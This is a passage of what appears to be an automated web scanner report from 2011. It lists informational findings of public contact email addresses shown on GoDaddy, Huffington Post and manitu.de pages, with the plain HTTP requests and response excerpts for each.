23.41. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.42. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.43. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.44. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.45. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest i
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.46. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';">
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...
23.47. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/03/26/geraldine-ferraro-dead-dies_n_840995.html HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; s_pers=%20s_getnr%3D1300989830624-New%7C1364061830624%3B%20s_nrgvo%3DNew%7C1364061830626%3B; __utma=265287574.492257335.1300987757.1300987757.1300987757.1; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 20:36:02 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 290906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<a href="mailto:huffpolitics@huffingtonpost.com">huffpolitics@huffingtonpost.com</a>
...[SNIP]...
23.48. http://www.manitu.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:05:56 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 23281

<html>

   <head>
       <title>manitu: Root-Server, Webhosting und DSL-Flatrates</title>
       <meta name="description" content="Root-Server, Webhosting und DSL-Flatrates mit .kostrom">
       <meta name="key
...[SNIP]...
<meta http-equiv="reply-to" content="webmaster@manitu.de (manitu)">
...[SNIP]...
<a href="mailto:honeypotaddress.donotwriteanyemails@manitu.de" style="color: #ffffff">
...[SNIP]...
23.49. http://www.manitu.de/dsl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /dsl/

Issue detail

The following email address was disclosed in the response:

Request

GET /dsl/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:38 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14612

<html>

   <head>
       <title>manitu: DSL-Flatrate mit fester IP-Adresse</title>
       <meta name="description" content="Deutschlandweite DSL-Flatrate mit fester IP-Adresse">
       <meta name="keywords
...[SNIP]...
<meta http-equiv="reply-to" content="webmaster@manitu.de (manitu)">
...[SNIP]...
23.50. http://www.manitu.de/root-server/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /root-server/

Issue detail

The following email address was disclosed in the response:

Request

GET /root-server/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:36 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25424

<html>

   <head>
       <title>manitu: Root-Server</title>
       <meta name="description" content="G.nstige und professionelle dedizierte Server (Root-Server)">
       <meta name="keywords" con
...[SNIP]...
<meta http-equiv="reply-to" content="webmaster@manitu.de (manitu)">
...[SNIP]...
23.51. http://www.manitu.de/shop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /shop/

Issue detail

The following email address was disclosed in the response:

Request

GET /shop/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:28 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 16239

<HTML>
   
   <HEAD>
   
       <TITLE>manitu: Fan-Shop</TITLE>
       
       <META NAME="title"        CONTENT="manitu: Fan-Shop">
       <META NAME="description"    CONTENT="Der manitu Fanartikel-Shop">
       <META NAME="keyword
...[SNIP]...
<META HTTP-EQUIV="reply-to"    CONTENT="webmaster@manitu.de (manitu)">
       <LINK REV="made"        TITLE="www.manitu.de"    HREF="mailto:webmaster@manitu.de">
       <LINK REL="author"        TITLE="www.manitu.de"    HREF="mailto:webmaster@manitu.de">
...[SNIP]...
23.52. http://www.manitu.de/webhosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/

Issue detail

The following email address was disclosed in the response:

Request

GET /webhosting/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 1873

<html>

   <head>
       <title>Webhosting, Webspace und Domains &ndash; manitu GmbH</title>
       <meta name="description" content="Professionelles Webhsting f&uuml;r Privat- und Gesch&auml;ftskunden
...[SNIP]...
<meta http-equiv="reply-to" content="webmaster@manitu.de (manitu)">
...[SNIP]...
